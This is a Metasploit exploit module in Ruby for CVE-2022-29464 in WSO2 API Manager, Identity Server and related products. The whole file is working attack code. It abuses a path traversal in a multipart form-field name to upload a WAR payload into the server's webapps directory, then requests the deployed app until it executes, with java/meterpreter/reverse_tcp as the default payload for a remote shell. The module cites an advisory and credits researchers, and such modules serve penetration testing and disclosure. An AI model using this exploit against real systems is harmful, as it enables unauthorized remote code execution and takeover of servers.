WSO Arbitrary File Upload / Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'WSO2 Arbitrary File Upload to RCE',  
'Description' => %q{  
This module abuses a vulnerability in certain WSO2 products that allow unrestricted file  
upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and  
above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server  
Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above  
through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.  
},  
'Author' => [  
'Orange Tsai', # Discovery  
'hakivvi', # analysis and PoC  
'wvu', # PoC  
'Jack Heysel <jack_heysel[at]rapid7.com>' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'CVE', '2022-29464'],  
[ 'URL', 'https://github.com/hakivvi/CVE-2022-29464' ],  
[ 'URL', 'https://twitter.com/wvuuuuuuuuuuuuu/status/1517433974003576833' ],  
[ 'URL', 'https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738' ]  
],  
'DefaultOptions' => {  
'Payload' => 'java/meterpreter/reverse_tcp',  
'SSL' => true,  
'RPORT' => 9443  
},  
'Privileged' => false,  
'Targets' => [  
[  
'Java Dropper',  
{  
'Platform' => 'java',  
'Arch' => ARCH_JAVA,  
'Type' => :java_dropper,  
'DefaultOptions' => {  
'WfsDelay' => 10  
}  
}  
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2022-04-01',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],  
'Reliability' => [REPEATABLE_SESSION]  
}  
)  
)  
register_options(  
[  
OptInt.new('WAR_DEPLOY_DELAY', [true, 'How long to wait for the war file to deploy, in seconds', 20 ]),  
OptString.new('TARGETURI', [ true, 'Relative URI of WSO2 product installation', '/'])  
]  
)  
end  
  
def check  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'fileupload', 'toolsAny'),  
'method' => 'POST'  
)  
  
if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /WSO2/  
Exploit::CheckCode::Appears  
else  
Exploit::CheckCode::Unknown  
end  
end  
  
def prepare_payload(app_name)  
print_status('Preparing payload...')  
  
war_payload = payload.encoded_war.to_s  
fname = app_name + '.war'  
path_traveral = '../../../../repository/deployment/server/webapps/' + fname  
post_data = Rex::MIME::Message.new  
post_data.add_part(war_payload,  
'application/octet-stream', 'binary',  
"form-data; name=\"#{path_traveral}\"; filename=\"#{fname}\"")  
post_data  
end  
  
def upload_payload(post_data)  
print_status('Uploading payload...')  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'fileupload', 'toolsAny'),  
'method' => 'POST',  
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",  
'data' => post_data.to_s  
)  
if res && res.code == 200  
print_good('Payload uploaded successfully')  
else  
fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed')  
end  
end  
  
def execute_payload(app_name)  
res = nil  
print_status('Executing payload... ')  
retry_until_true(timeout: datastore['WAR_DEPLOY_DELAY']) do  
print_status('Waiting for shell... ')  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, app_name),  
'method' => 'GET'  
)  
if res && res.code == 200  
break  
else  
next  
end  
end  
  
if res && res.code == 200  
print_good('Payload executed successfully')  
else  
fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed')  
end  
end  
  
# Retry the block until it returns a truthy value. Each iteration attempt will  
# be performed with expoential backoff. If the timeout period surpasses, false is returned.  
def retry_until_true(timeout:)  
start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)  
ending_time = start_time + timeout  
retry_count = 0  
while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time  
result = yield  
return result if result  
  
retry_count += 1  
remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)  
break if remaining_time_budget <= 0  
  
delay = 2**retry_count  
if delay >= remaining_time_budget  
delay = remaining_time_budget  
vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")  
else  
vprint_status("Sleeping for #{delay} seconds before attempting again")  
end  
  
sleep delay  
end  
end  
  
def exploit  
app_name = Rex::Text.rand_text_alpha(4..7)  
data = prepare_payload(app_name)  
upload_payload(data)  
execute_payload(app_name)  
end  
  
end  
`